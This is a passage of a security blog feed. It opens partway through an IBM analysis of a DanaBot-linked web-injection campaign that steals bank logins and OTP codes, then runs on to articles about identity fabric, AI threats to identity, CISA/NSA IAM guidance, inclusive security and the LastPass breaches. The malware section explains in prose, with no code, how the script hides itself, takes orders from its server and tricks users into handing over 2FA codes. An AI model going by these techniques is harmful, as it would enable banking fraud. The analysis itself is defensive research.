Scroll to view full table

In addition, the injection looks for a popular security vendor’s JavaScript agent by searching for the keyword “adrum” in the current page URL. If the word exists, the injection doesn’t run.

Figure 3: Searching for a security product’s keyword and doing nothing if it’s found

The injection also performs function patching, changing built-in functions that are used to gather information about the current page document object model (DOM) and JavaScript environment. The patch removes any remnant evidence of the malware from the session.

All of these actions are performed to help conceal the presence of the malware.

Dynamic web injection

The script’s behavior is highly dynamic, continuously querying both the command and control (C2) server and the current page structure and adjusting its flow based on the information obtained.

The structure is similar to a client-server architecture, where the script maintains a continuous flow of updates to the server while requesting further instructions.

To keep a record of its actions, the script sends a request to the server, logging pertinent information, such as the originating function, success or failure status and updates on various flags indicating the current state.

Figure 4: Every a.V function call sends an update to the server about what function it was sent from and the current state of different flags

Figure 5: An example of multiple traffic logs, sent within a few seconds of the script running

The script relies on receiving a specific response from the server, which determines the type of injection it should execute, if any. This type of communication greatly enhances the resilience of the web injection.

For instance, it enables the injection to patiently wait for a particular element to load, provide the server with updates regarding the presence of the injected OTP field, retry specific steps (such as injecting an SMS submission overlay) or redirect to the login page before displaying an alert indicating that the bank is temporarily unavailable.

The server keeps identifying the device by the bot ID, so even if the client tries to refresh or load the page again, the injection can continue from its previously executed step.

If the server does not respond, the injection process will not proceed. Hence, for this injection to be effective, the server must remain online.

Script flow

The script is executed within an anonymous function, creating an object that encompasses various fields and helper functions for its usage. Within the object, the injection holds the initial configuration with fields such as bot ID, phone number and password. These fields are initially empty but are populated with relevant values as the run progresses.

Additionally, the object includes details such as the C2 server’s domain and requests path, default values for query parameters and default settings for various flags such as “send SMS” and “send token.” These default values can be modified later based on the server’s response, allowing for dynamic adjustments during runtime.

Following the initial configuration, the script sends a request to the server providing initial details, and assigns a callback to handle the response, allowing the execution to proceed.

Subsequently, the script proceeds to remove itself from the DOM tree, enhancing its ability to conceal its actions. From that stage onward, all subsequent script actions are asynchronous, saved inside event handlers and dependent on the responses received from the server.

The steps the script should perform are mostly based on an “mlink” flag received from the server on the initial request. The next step of the injection is to check for the specific login button of the targeted bank. The results of the element query are sent, and the “mlink” state changes accordingly.

Following that, a new function runs asynchronously on an interval, looking for the login button and assigning a malicious event listener if found. The listener waits for a click event, collects the login credentials and handles it based on the current configuration.

For example, if the “collect token” flag is on, but the script can’t find the two-factor authentication (2FA) token input field, it just stops the current run and does nothing. If the token is found or wasn’t looked for in the first place, the script sends all the gathered information to the server.

After that, it can inject a “loading” bar to the page (opengif function), cancel the original login action or allow the client to continue with the actions by removing the handler and “clicking” it again on behalf of the user (by dispatching another “click” event).

Figure 6: The event listener prevents the default action of the login button or deletes itself and dispatches another click event based on the outcome of function G

Figure 7: This section of function G reads credentials and tries to read the injected token field value, depending on the current state of the page and flags

Potential operational states

Returning to the “synchronous” part of the callback, let’s examine some potential operational states and the corresponding actions taken.

When the “mlink” value is 2, the script injects a div that prompts the user to choose a phone number for 2FA. Once the user selects a phone number, a login attempt can be executed using the stolen credentials, and a valid token is sent to the victim from the bank.

Figure 8: Prompting a phone number for two-factor authentication

The following state is when “mlink” is equal to three, where the input field for the OTP token is injected. In this manner, DanaBot deceives the victim into providing the token, effectively bypassing the 2FA protection mechanism.

Figure 9: Prompting for the received token

When the “mlink” value is four, the script introduces an error message on the login page, indicating that online banking services will be unavailable for a duration of 12 hours. This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with an opportunity to perform uninterrupted actions.

Figure 10: An error message that banking services are unavailable for 12 hours, giving the threat actor ample time to work

When the “mlink” value is 5, the script injects a page loading overlay that mimics the appearance of the original website’s loading animation. A timeout is set before transitioning to a different state, effectively “completing” the page load process.

Figure 11: An injected loading screen, an exact duplicate of the original loading screen

When the value of “mlink” is six, a “clean up” flow is initiated, removing any injected content from the page. This value serves as the default assignment for the flag in case no specific instruction is received from the server.

Mlink value

Operation

2

2FA choose phone number prompt

3

2FA insert token prompt

4

Online banking unavailable error

5

Page loading overlay

6

Cleanup

Scroll to view full table

In total, there are nine distinct potential values for the “mlink” variable, each corresponding to different states and behaviors. Additionally, multiple flags activate various actions and result in different data being sent back to the server. Combining these “mlink” values and flags allows for a diverse range of actions and data exchanges between the script and the server.

Urging vigilance

IBM has observed widespread activity from this malware campaign affecting banking applications of numerous financial institutions across North America, South America, Europe and Japan. This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state. The malware represents a significant danger to the security of financial institutions and their customers.

Users should practice vigilance when using banking apps. This includes contacting their bank to report potentially suspicious activity on their accounts, not downloading software from unknown sources and following best practices for password hygiene and email security hygiene.

Individuals and organizations must also remain vigilant, implement robust security measures and stay informed about emerging malware to effectively counteract these threats.

IBM Security Trusteer helps you to detect fraud, authenticate users and establish identity trust across the omnichannel customer journey. More than 500 leading organizations rely on Trusteer to help secure their customers’ digital journeys and support business growth.

The post Web injections are back on the rise: 40+ banks affected by new malware campaign appeared first on Security Intelligence.

]]>
Taking the complexity out of identity solutions for hybrid environments https://securityintelligence.com/posts/taking-complexity-out-of-identity-solutions-for-hybrid-environments/ Fri, 01 Dec 2023 14:00:00 +0000 https://securityintelligence.com/?p=446267 For the past two decades, businesses have been making significant investments to consolidate their identity and access management (IAM) platforms and directories to manage user identities in one place. However, the hybrid nature of the cloud has led many to realize that this ultimate goal is a fantasy. Instead, businesses must learn how to consistently […]

The post Taking the complexity out of identity solutions for hybrid environments appeared first on Security Intelligence.

]]>

For the past two decades, businesses have been making significant investments to consolidate their identity and access management (IAM) platforms and directories to manage user identities in one place. However, the hybrid nature of the cloud has led many to realize that this ultimate goal is a fantasy. Instead, businesses must learn how to consistently and effectively manage user identities across multiple IAM platforms and directories.

As cloud migration and digital transformation accelerate at a dizzying pace, enterprises are left with a host of new identity challenges that many aren’t prepared to deal with. The proliferation of diverse cloud environments, each with its own identity solutions, coupled with the complexities of legacy systems, has resulted in fragmented and siloed identity services. That is where the identity fabric comes in.

The challenge of hybrid identity

Most environments are comprised of a mixture of multiple cloud and on-premise (on-prem) applications and systems. Though many are moving to modern Software-as-a-Service (SaaS) solutions, on-prem IAM products are often deeply embedded in mission-critical systems of organizations. They can’t simply be unplugged and replaced with modernized IAM solutions without risking significant business disruption, loss of data continuity, potential security risks and single points of failure.

Additionally, many modern IAM solutions struggle to meet the complex requirements of large, multi-layered organizations, including user role management, compliance with industry-specific regulations and integration with existing IT infrastructure. It has become painfully evident that a one-size-fits-all IAM system doesn’t exist, forcing organizations to use a combination of IAM systems across hybrid clouds and on-prem. A recent Osterman Research Report found that 52% of organizations stated that addressing identity access challenges in hybrid and multi-cloud environments was a critical initiative for them over the next year.

Managing identity fragmentation

As identity services multiply across hybrid cloud environments, organizations struggle to manage and enforce consistent user policies, comply with changing regulations, gain holistic visibility and mitigate user-related risks. Legacy applications remain tethered to legacy identity solutions, creating an inconsistent user experience without a single authoritative source for a user’s identity. Osterman research showed the top identity initiative for the next twelve months for 64% of the responding organizations was extending cloud identity capabilities to on-prem applications.

What is an identity fabric?

Businesses need a versatile solution that complements existing identity solutions while effectively integrating the various IAM silos that organizations have today into a cohesive whole. To provide consistent security policies and a better user experience, businesses require the ability to quickly audit all authentication workflows, layer intelligence to automate data-driven decisions and empower artificial intelligence (AI) and machine learning (ML) across legacy and on-prem applications in hybrid cloud deployments.

This is where an identity fabric comes into play: to bridge the gap between legacy identity infrastructure and modern cloud-based IAM systems. An identity fabric aims to integrate and enhance existing solutions rather than replace them. The goal is to create a less complex environment where consistent security authentication flows and visibility can be enforced. This approach aligns with our strategy of “taking the complexity out of identity solutions for hybrid environments.”

Learn more about identity fabric

Providing the foundation for an identity fabric

We have found that there are some fundamental building blocks to delivering an effective identity fabric:

  • The first step is to eliminate the identity silos by creating a single, authoritative directory. It’s critical that this directory be vendor-agnostic so it can stitch together all of your directories to create a single source of truth, management and enforcement. IBM Security Verify Directory offers flexibility, efficiency and scalability across on-prem, cloud and hybrid environments, providing smooth and secure access control.
  • The next step is to extend modern authentication mechanisms to your legacy applications, which are often abandoned due to the need for more funding, time and/or skills to modify existing application authentication flows. IBM’s Application Gateway is a product-agnostic gateway designed to bridge the gap between legacy and modern apps and systems with no-code integrations that allow legacy applications to take advantage of modern and advanced authentication capabilities, helping to reduce risk and improve regulatory compliance.
  • The third step incorporates behavioral risk-based authentication for modern and legacy applications. Regardless of the IAM solutions in use, risk-based authentication solutions enable a continuous assessment of risk levels at the time of access. Verify Trust introduces dynamic risk-based authentication, enhancing security without requiring a complete system overhaul. Powered by AI, Verify Trust delivers accurate and continuous risk-based access protection against the latest account takeover techniques by combining global intelligence, user behavioral biometrics, authentication results, network data, account history and a range of device risk detection capabilities.

Explore the Verify family

Orchestration holds your identity fabric together

Orchestration is the integration glue to an identity fabric. Without it, building an identity fabric would be resource-intensive. Orchestration allows more intelligent decision-making and simplifies onboarding and offboarding. It enables you to build consistent security policies while taking the burden off your administrators as you quickly and easily automate processes at scale.

For example, you have a legacy application with a homegrown identity system. The people who wrote it have long since left. Orchestration enables you to create a workflow so that when a user logs in to the system, it automatically creates a user account on the preferred modern identity solution with low code or no code identity orchestration. When users return to that homegrown application, they will automatically access it with a modern authentication mechanism.

Effective identity orchestration allows you to achieve simplicity in legacy and modern application coexistence, remove the burden of identity solution proliferation, consolidate identity silos, reduce identity solution vendor lock-in and simplify identity solution migrations by allowing for highly customizable flows with little-to-no code across identity solutions.

Take the next step in identity solutions

Whether you are an organization looking for workforce access, customer IAM, privileged access or governance identity solutions, or looking to build an identity fabric with your existing identity solutions, IBM Security Verify takes the complexity out of identity solutions for hybrid environments, emphasizing innovation and customer-centricity. We invite all stakeholders to join us on this transformative journey as we shape the future of IAM. Together, we will simplify identity solutions for the ever-evolving world of hybrid environments.

Join us for a webinar to learn more.

The post Taking the complexity out of identity solutions for hybrid environments appeared first on Security Intelligence.

]]>
Artificial intelligence threats in identity management https://securityintelligence.com/articles/artificial-intelligence-threats-in-identity-management/ Tue, 01 Aug 2023 13:00:00 +0000 https://securityintelligence.com/?p=443479 The 2023 Identity Security Threat Landscape Report from CyberArk identified some valuable insights. 2,300 security professionals surveyed responded with some sobering figures: 68% are concerned about insider threats from employee layoffs and churn 99% expect some type of identity compromise driven by financial cutbacks, geopolitical factors, cloud applications and hybrid work environments 74% are concerned […]

The post Artificial intelligence threats in identity management appeared first on Security Intelligence.

]]>

The 2023 Identity Security Threat Landscape Report from CyberArk identified some valuable insights. 2,300 security professionals surveyed responded with some sobering figures:

Additionally, many feel digital identity proliferation is on the rise and the attack surface is at risk from artificial intelligence (AI) attacks, credential attacks and double extortion. For now, let’s focus on digital identity proliferation and AI-powered attacks.

Digital identities: The solution or the ultimate Trojan horse?

For some time now, digital identities have been considered a potential solution to improve cybersecurity and reduce data loss. The general thinking goes like this: Every individual has unique markers, ranging from biometric signatures to behavioral actions. This means digitizing and associating these markers to an individual should minimize authorization and authentication risks.

Loosely, it is a “trust and verify” model.

But what if the “trust” is no longer reliable? What if, instead, something fake is verified — something that should never be trusted in the first place? Where is the risk analysis happening to remedy this situation?

The hard sell on digital identities has, in part, come from a potentially skewed view of the technology world. Namely, both information security technology and malicious actor tactics, techniques, and procedures (TTPs) change at a similar rate. Reality tells us otherwise: TTPs, especially with the assistance of AI, are blasting right past security controls.

You see, a hallmark of AI-enabled attacks is that the AI can learn about the IT estate faster than humans can. As a result, both technical and social engineering attacks can be tailored to an environment and individual. Imagine, for example, spearphishing campaigns based on large data sets (e.g., your social media posts, data that has been scraped off the internet about you, public surveillance systems, etc.). This is the road we are on.

Digital identities may have had a chance to successfully operate in a non-AI world, where they could be inherently trusted. But in the AI-driven world, digital identities are having their trust effectively wiped away, turning them into something that should be inherently untrustworthy.

Trust needs to be rebuilt, as a road where nothing is trusted only logically leads to one place: total surveillance.

Artificial intelligence as an identity

Identity verification solutions have become quite powerful. They improve access request time, manage billions of login attempts and, of course, use AI. But in principle, verification solutions rely on a constant: trusting the identity to be real.

The AI world changes that by turning “identity trust” into a variable.

Assume the following to be true: We are relatively early into the AI journey but moving fast. Large language models can replace human interactions and conduct malware analysis to write new malicious code. Artistry can be performed at scale, and filters can make a screeching voice sound like a professional singer. Deep fakes, in both voice and visual representations, have moved away from “blatantly fake” territory to “wait a minute, is this real?” territory. Thankfully, careful analysis still permits us the ability to distinguish the two.

There is another hallmark of AI-enabled attacks: machine learning capabilities. They will get faster, better and ultimately prone to manipulation. Remember, it is not the algorithm that has a bias, but the programmer inputting their inherent bias into the algorithm. Therefore, with open source and commercial AI technology availability on the rise, how long can we maintain the ability to distinguish between real and fake?

Explore IAM services

Overlay technologies to make the perfect avatar

Think of the powerful monitoring technologies available today. Biometrics, personal nuances (walking patterns, facial expression, voice inflections, etc.), body temperatures, social habits, communication trends and everything else that makes you unique can be captured, much of it by stealth. Now, overlay increasing computational power, data transfer speeds and memory capacity.

Finally, add in an AI-driven world, one where malicious actors can access large databases and perform sophisticated data mining. The delta to create a convincing digital replica shrinks. Paradoxically, as we create more data about ourselves for security measures, we grow our digital risk profile.

Reduce the attack surface by limiting the amount of data

Imagine our security as a dam and data as water. To date, we have leveraged data for mostly good means (e.g., water harnessed for hydroelectricity). There are some maintenance issues (e.g., attackers, data leaks, bad maintenance) that are mostly manageable thus far, if exhausting.

But what if the dam fills at a rate faster than that of what the infrastructure was designed to manage and hold? The dam fails. Using this analogy, the play is then to divert excess water and reinforce the dam or limit data and rebuild trust.

What are some methods to achieve this?

  1. The top-down approach creates guardrails (strategy). Generate and hold only the data you need, and even go as far as disincentivizing excess data holds, especially data tied to individuals. Fight the temptation to scrape and data mine absolutely everything for the sake of micro-targeting. It’s more water into the reservoir unless there are more secure reservoirs (hint: segmentation).
  2. The bottom-up approach limits access (operations). Whitelisting is your friend. Limit permissions and start to rebuild identity trust. No more “opt-in” by default; move to “opt-out” by default. This allows you to manage water flow through the dam better (e.g., reduced attack surface and data exposure).
  3. Focus on what matters (tactics). We have demonstrated we cannot secure everything. This is not a criticism; it is reality. Focus on risk, especially for identity and access management. Coupled with limited access, the risk-based approach prioritizes the cracks in the dam for remediation.

In closing, risk must be taken to realize future rewards. “Risk-free” is for fantasy books. Therefore, in the age of a glut of data, the biggest “risk” may be to generate and hold less data. The reward? Minimized impact from data loss, allowing you to bend while others break.

The post Artificial intelligence threats in identity management appeared first on Security Intelligence.

]]>
CISA, NSA issue new IAM best practice guidelines https://securityintelligence.com/articles/cisa-nsa-issue-new-iam-best-practice-guidelines/ Wed, 24 May 2023 13:00:00 +0000 https://securityintelligence.com/?p=442297 The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released a new 31-page document outlining best practices for identity and access management (IAM) administrators. As the industry increasingly moves towards cloud and hybrid computing environments, managing the complexities of digital identities can be challenging. Nonetheless, the importance of IAM cannot […]

The post CISA, NSA issue new IAM best practice guidelines appeared first on Security Intelligence.

]]>

The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released a new 31-page document outlining best practices for identity and access management (IAM) administrators.

As the industry increasingly moves towards cloud and hybrid computing environments, managing the complexities of digital identities can be challenging. Nonetheless, the importance of IAM cannot be overstated in today’s world, where data security is more critical than ever. Meanwhile, IAM itself can be a source of vulnerability if not implemented and managed effectively.

Identity-related tactics used by threat actors

The CISA and NSA report highlighted real-world examples to illustrate the type and severity of threats targeting IAM. For example, CISA Alert (AA21-321A) revealed that advanced persistent threat (APT) actors sponsored by the Iranian government are actively exploiting IAM vulnerabilities. The alert showed how attackers can compromise credentials, escalate privileges and create new user accounts on critical infrastructure components across various sectors in the United States.

These vulnerabilities allowed actors to gain access to domain controllers, servers, workstations and directories responsible for authenticating and authorizing users and devices. With this level of access, APT actors could conduct follow-on operations like data exfiltration, encryption, ransomware and extortion.

Moreover, cyber groups are increasingly targeting Single Sign-On (SSO) technology, a critical component of IAM. By exploiting SSO functions, actors can potentially bypass traditional access controls and gain access to a broad range of resources across the organization.

IAM threat mitigation techniques

The best practices discussed in the CISA-NSA report revolved around tactics that counter threats to IAM through deterrence, prevention, detection, damage limitation and response. These techniques include:

  • Identity Governance
  • Environmental Hardening
  • Identity Federation and Single Sign-On
  • Multi-Factor Authentication
  • IAM Monitoring and Auditing.

Let’s look at each of these in more detail.

Identity governance

Identity governance is a process that centralizes user and service accounts management based on organizational policies. This provides enhanced visibility and controls to prevent unauthorized access. Identity governance includes segregation of duties, role management, logging, access review, analytics and reporting.

As per CISA / NSA, identity governance focuses on three key user lifecycle moments within an organization:

  • When a user joins: Identity governance collects biographical, position-related and credential data (certifications or clearances) from recruiting, human capital management and personnel security systems to build an identity record for the individual.
  • When a user moves within the organization: If an individual’s role in the organization changes, additional entitlements are automatically granted for their new role as well as the removal of entitlements that are no longer needed.
  • When a user leaves: When users leave an organization for any reason, their accounts and privileges must be promptly terminated. Identity governance can automate the disablement and removal of accounts in response to separation actions in human capital management systems or other personnel systems.

Environmental hardening

The CISA-NSA report points out that hardening the enterprise environment involves ensuring that IAM foundations and implementations are trustworthy and secure. The level of hardening required varies depending on the assets being protected. For instance, credential-issuing systems for cryptographic digital certificates or password stores are more critical since they secure authentication for entire organizations.

Environmental hardening is crucial in securing the hardware and software components surrounding an IAM solution. Some environmental hardening best practices include patching, asset management and network segmentation. Combining these with strong IAM foundations and implementations reduces the chance of a security breach and minimizes damage in the event of a breach.

CISA / NSA recommend the following immediate actions to improve environmental hardening:

  • Take an inventory of all assets within the organization. Determine the cause of missing or additional unrecognized assets.
  • Identify all the local identities on the assets to know who has access to which assets.
  • Understand what security controls are in the enterprise environment now and what security gaps persist.
  • Develop a network traffic baseline to detect network security anomalies.

Identity federation and SSO

Identity federation, which involves SSO within or between organizations, can effectively manage differences in policies and risk levels. A centralized approach to managing identities ensures compliance with organizational policies and reduces the risk of security breaches.

Identity Federation and SSO eliminate the need for users to maintain multiple identities in both internal and external directories, applications and other platforms. It removes the requirement for local identities at every asset, ensuring seamless integration with other security controls such as privileged access management for step-up authentication. This increases the confidence that only active users are allowed access, thereby enhancing security.

SSO makes life easier for users as they only need to remember one complex and hard-to-guess passphrase. It also facilitates the move to strong MFA which can potentially eliminate passwords altogether.

Multi-factor authentication

Authentication systems are a primary target for attackers, who seek out and exploit their vulnerabilities. They are also high-volume user interfaces and are often seen as obstacles to user productivity. As a result, the challenge for engineers is to create seamless and user-friendly authentication systems that are also highly secure against attacks.

MFA strengthens password-based authentication by requiring an additional factor, which mitigates common attacks and misuse practices. Meanwhile, passwordless authentication eliminates passwords as an attack vector.

MFA can be based on:

  • Something you have (smartphone, key fob)
  • Something you know (password, mother’s maiden name, etc.)
  • Something you are (fingerprint or biometric facial scan).

The most secure types of MFA include fast identity online (FIDO) and public key infrastructure (PKI). FIDO stores personally identifiable information, such as biometric authentication data, locally on the user’s device. PKI uses digital certificates to verify the user’s identity and permissions.

App-based MFA solutions are of intermediate strength. App-based solutions include mobile push notifications, one-time passwords (OTPs) or token-based OTP. Meanwhile, SMS and voice messages are the least secure type of MFA.

IAM monitoring and auditing

As per the CISA / NSA report, IAM auditing and monitoring should focus on compliance checks as well as identifying threat indicators and detecting anomalous activities. This involves generating, collecting and analyzing logs, events and other data to provide effective means of identifying compliance breaches and suspicious actions.

Integrating automated tools with auditing and monitoring capabilities can help orchestrate response actions against IAM attacks. Additionally, effective reporting from these processes can provide situational awareness of an organization’s security posture regarding IAM.

Identity matters now more than ever

The new CISA / NSA guidelines build upon the experience and observation of years of IAM implementations. For any enterprise, a well-developed IAM strategy is essential for effective security.

You can read the entire CISA / NSA Best Practices report here.

The post CISA, NSA issue new IAM best practice guidelines appeared first on Security Intelligence.

]]>
The importance of accessible and inclusive cybersecurity https://securityintelligence.com/articles/importance-of-accessible-inclusive-cybersecurity/ Wed, 19 Apr 2023 13:00:00 +0000 https://securityintelligence.com/?p=441643 As the digital world continues to dominate our personal and work lives, it’s no surprise that cybersecurity has become critical for individuals and organizations. But society is racing toward “digital by default”, which can be a hardship for individuals unable to access digital services. People depend on these digital services for essential online services, including […]

The post The importance of accessible and inclusive cybersecurity appeared first on Security Intelligence.

]]>

As the digital world continues to dominate our personal and work lives, it’s no surprise that cybersecurity has become critical for individuals and organizations.

But society is racing toward “digital by default”, which can be a hardship for individuals unable to access digital services. People depend on these digital services for essential online services, including financial, housing, welfare, healthcare and educational services. Inclusive security ensures that such services are as widely accessible as possible and provides digital protections to users regardless of the individual’s capabilities, abilities and resources.

Therefore, to adequately address cybersecurity risks, we must also consider accessibility and inclusivity. But not everyone has equal access to digital devices or skill sets, leaving them more vulnerable to cyberattacks. The COVID-19 pandemic also underscored the significant role digital access plays in society.

Let’s examine the significance of accessible and inclusive cybersecurity and the steps we can take to enhance security for all.

What is accessible and inclusive cybersecurity?

Accessible and inclusive cybersecurity refers to designing and implementing cybersecurity measures to fit the needs of all individuals. This implies designing policies, procedures and technologies with those with disabilities or other marginalized groups in mind.

The goal of accessible and inclusive cybersecurity is to guarantee that everyone has equal access to the tools and resources necessary for protection from cyber threats — including anyone with limited physical access to digital devices, limited technical skill sets or other barriers.

By making cybersecurity more accessible and inclusive, we can create a more equitable and secure digital environment for everyone.

Unfortunately, the statistics are not in our favor. Accessibility issues remain a major challenge for those who are digitally excluded. According to 2022 data from the World Bank, approximately 3 billion people worldwide remain offline due to factors like income, geography, education and disability.

Individuals left out of the digital world often need access to tools and resources to protect themselves against cyberattacks.

Why accessibility matters are so critical

Accessibility issues pose a significant hurdle for those who are digitally excluded.

But what is digital exclusion? It refers to the absence of physical access to digital devices, the inability to develop skills needed in the digital world and access disparities based on factors like income or location.

Physical access to digital devices can be a significant barrier for anyone living with disabilities or in remote areas. Individuals with visual impairments may find it difficult to use devices that do not have accessible features, such as screen readers or magnification tools. Additionally, those living in these remote places may lack high-speed internet or reliable electricity, thus restricting their capacity to utilize modern technology.

Skills to navigate the digital world present a significant obstacle for digitally excluded people. A 2021 report from Pew Research Center revealed that 14% of adults with a high school education or less do not use the internet. Many cited a lack of digital skills as their primary barrier. Without the knowledge and ability to protect oneself online from threats such as viruses and phishing attempts, individuals may become more susceptible to cyber crimes due to their inability to recognize and mitigate potential dangers.

Finally, factors like income and geography can severely limit access to digital technology and resources. In many places around the world, individuals living in low-income areas may not have access to high-speed internet or may lack the financial means to purchase digital devices. This presents a major obstacle for those trying to make ends meet.

When it comes to cyber threats, accessibility issues are a significant concern for those who are digitally excluded and can immensely impact an individual’s capacity to protect themselves.

COVID-19 and the importance of digital access and cybersecurity

The COVID-19 pandemic has brought about profound changes to our daily lives, such as how we access essential services and work. With social distancing measures in place, many have turned to digital technology for healthcare, education and other essential needs. Furthermore, many companies have moved towards remote work models, further underscoring the significance of secure digital access and cybersecurity measures.

However, the transition to digital technology has also highlighted the digital divide and the challenges faced by those it excludes. People may struggle to access healthcare services or work remotely without reliable internet or devices. Similarly, those without strong digital skills could be more vulnerable to cyber threats when navigating unfamiliar digital environments.

The COVID-19 pandemic has presented cybersecurity risks. As more people rely on the internet to work and access essential services, cyber criminals are launching more advanced attacks. According to a report from the FBI, reported cyber crimes increased dramatically after the pandemic. These incidents can have devastating results, such as financial loss, identity theft and damage to personal and professional reputations.

COVID-19 has brought to light the essential role digital access and cybersecurity play in our society. Moving forward, it is essential to address the digital divide and design cybersecurity measures with accessibility and inclusivity in mind.

Steps to promote accessible and inclusive cybersecurity

Improving accessible and inclusive cybersecurity is a complex challenge. Moving forward requires the collaboration of stakeholders such as governments, technology companies and civil society organizations.

Still, there are steps that can be taken to promote accessibility and inclusivity in cybersecurity:

Create accessible cybersecurity policies and standards. Governments and technology companies should collaborate to develop policies and standards that guarantee cybersecurity measures are accessible and inclusive, taking into account the needs of people with disabilities and other marginalized groups. These rules and standards should be tailored specifically for this purpose.

Provide digital skills training. Offering digital skills training can give digitally excluded individuals the confidence to go digital and protect themselves from cyber threats. Governments, technology companies and civil society organizations all have a role to play in providing this type of instruction.

Ensure digital devices and software are accessible. Digital devices and software should be designed with accessibility features like screen readers or magnification tools in mind — enabling individuals with disabilities to utilize modern technology and protect themselves from cyber threats.

Address inequalities of access. Governments and technology companies should collaborate to address disparities in access to digital technology and resources. This could include initiatives that increase access to high-speed internet and digital devices.

Involve individuals with disabilities and other marginalized groups in cybersecurity decision-making. It is essential to include individuals with disabilities and other marginalized groups in cybersecurity decision-making, so their needs and perspectives can guide the process.

Equitable cybersecurity is the future

Improving accessible and inclusive cybersecurity is a daunting challenge. However, it’s also a critical step toward creating a more equitable and secure digital space for everyone. By working together, we can design cybersecurity measures with inclusivity in mind so that everyone has equal access to the tools and resources needed to protect themselves against cyber threats.

The post The importance of accessible and inclusive cybersecurity appeared first on Security Intelligence.

]]>
What’s going on with LastPass, and is it safe to use? https://securityintelligence.com/articles/whats-going-on-with-lastpass-and-is-it-safe-to-use/ Tue, 11 Apr 2023 13:00:00 +0000 https://securityintelligence.com/?p=441512 When it comes to password managers, LastPass has been one of the most prominent players in the market. Since 2008, the company has focused on providing secure and convenient solutions to consumers and businesses. Or so it seemed. LastPass has been in the news recently for all the wrong reasons, with multiple reports of data […]

The post What’s going on with LastPass, and is it safe to use? appeared first on Security Intelligence.

]]>

When it comes to password managers, LastPass has been one of the most prominent players in the market. Since 2008, the company has focused on providing secure and convenient solutions to consumers and businesses. Or so it seemed.

LastPass has been in the news recently for all the wrong reasons, with multiple reports of data breaches resulting from failed security measures. To make matters worse, many have viewed LastPass’s response to these incidents as less than adequate. The company seemed to downplay the severity of the incidents and failed to provide adequate transparency of the issues within a reasonable amount of time.

The recent events have led many to wonder if these are the last days for LastPass. Or is this simply a roadblock in the company’s long history of reliable security? You be the judge.

LastPass’s recent history of security failures

For many years, the industry recognized LastPass as a reliable and secure password-management service. In fact, LastPass grew its subscriber list to more than 33 million users and over 100,000 businesses globally. Touting its Zero-Knowledge architecture, 256-bit encryption and attractive user interface, LastPass was seen as the go-to option for secure password management. Unfortunately, 2022 proved to be a tumultuous year for the self-proclaimed “pioneer in cloud security technology”. So far, 2023 isn’t providing much comfort either.

On August 25, 2022, the CEO of LastPass informed users that the organization detected “unusual activity” in its development environment. LastPass later confirmed the activity as a security breach. According to LastPass, they had no evidence that the intrusion had compromised customer data. The company still assured its users that they “implemented additional enhanced security measures” to better protect their environment moving forward.

The security issues continue

Then in November of 2022, LastPass stated that its third-party cloud storage service, which it shared with its partner GoTo, was also breached using the same information it obtained in the August attack. LastPass notified authorities and insisted that its customers’ data was safe due to its Zero-Knowledge architecture.

Fast forward one month later. In December of 2022, LastPass updated their findings from the August data breach and advised all of their users that hackers did, in fact, obtain an extensive amount of secure details from all of their user accounts, including usernames, email addresses, IP information and other sensitive data. Of particular concern was the fact that customer vault data was among the stolen information. However, according to LastPass, the heavily encrypted data would remain very difficult for the attackers to decrypt.

On March 1, 2023, the penny dropped when LastPass notified users of its official findings that the incident surrounding its recent breaches was due to a compromised software engineer’s corporate laptop. The threat actor targeted a senior DevOps engineer, exploiting third-party software, and gained access to “highly secure” API and third-party integration secrets, system configuration data and encrypted and unencrypted user data.

What risks are LastPass users now facing?

In short, if you are or were one of LastPass’s subscribers, hackers can access all of your LastPass vault data. Let that sink in for a minute.

Before you run to your computer and start dismantling it in fear, it’s important to recognize the significance of LastPass’ 256-bit encryption protocol. While hackers may have access to your data, it remains extremely difficult for them to actually use that information without the proper decryption key.

However, this does not discount the fact that users are now facing a heightened risk of identity theft and fraud. The most troubling of LastPass’s recent statements suggest that hackers gained access to the company’s encryption protocols and proprietary software, which could lead to the potential for attackers to decrypt customer vault data down the road using sophisticated tools.

Additionally, LastPass’ vault security is only as strong as the chosen master password. It’s clear that many users will need to take action sooner rather than later to close the security gap.

Is LastPass still safe to use?

Following the aftermath of the recent LastPass data breaches, it’s no secret that the company is doing serious damage control: not only to its security systems and process but also to its brand reputation.

However, one of the main issues that LastPass has to address to the public is its response time. LastPass was slow to not only investigate the threats but also to subsequently inform its users of the various breaches. This delay showcased a lack of transparency from LastPass, indicating that the company did not properly manage security processes or take appropriate measures to protect customer data.

Security experts are starting to agree that LastPass has let its guard down when it comes to protecting user data, potentially by focusing too much on attracting new market share and not enough on proper security protocols. The general message is that LastPass may still be utilizing strong encryption protocols, but there are still too many unanswered questions when it comes to how they handle persistent threats.

As Jeremi Gosney, esteemed password cracker and Senior Principal Engineer of the Yahoo security team, recently explained in an extensive series of posts, “I used to support LastPass. I recommended it for years and defended it publicly in the media… But things change.”

In addition, Gosney released a comprehensive article on Infosec Exchange urging people to switch to an alternate password manager for greater security.

“LastPass’s claim of ‘zero knowledge’ is a bald-faced lie,” Gosney says, alleging that the company has “about as much knowledge as a password manager can possibly get away with.”

What should your next step be?

When it comes to password management, there are always multiple arguments to bring to the table.

On the one hand, LastPass offers a great user experience and powerful security features. While the most recent incidents paint them in an incriminating light, the security measures they use aren’t significantly different from those of other password managers.

On the other hand, everyone needs to ask themselves whether their data is “really” secure when placed in third-party hands. For many, this situation only heightens the need for more organizations to move to passwordless environments that eliminate the need for users to store and change their passwords regularly.

But for those current users of LastPass who are still unsure about whether or not to move their password security to another provider, simplify your decision by considering the answer to this question:

If you were a bank owner who just experienced a robbery only to find out that your bank security team was sleeping on the job, would you still trust them to get the job done right? Or would you find someone else more qualified?

The post What’s going on with LastPass, and is it safe to use? appeared first on Security Intelligence.

]]>
Cybersecurity in the next-generation space age, pt. 3: Securing the new space https://securityintelligence.com/posts/cybersecurity-in-the-next-generation-space-age-pt-3-securing-new-space/ Fri, 24 Feb 2023 23:30:00 +0000 https://securityintelligence.com/?p=440650 View Part 1, Introduction to New Space, and Part 2, Cybersecurity Threats in New Space, in this series. As we see in the previous article of this series discussing the cybersecurity threats in the New Space, space technology is advancing at an unprecedented rate — with new technologies being launched into orbit at an increasingly […]

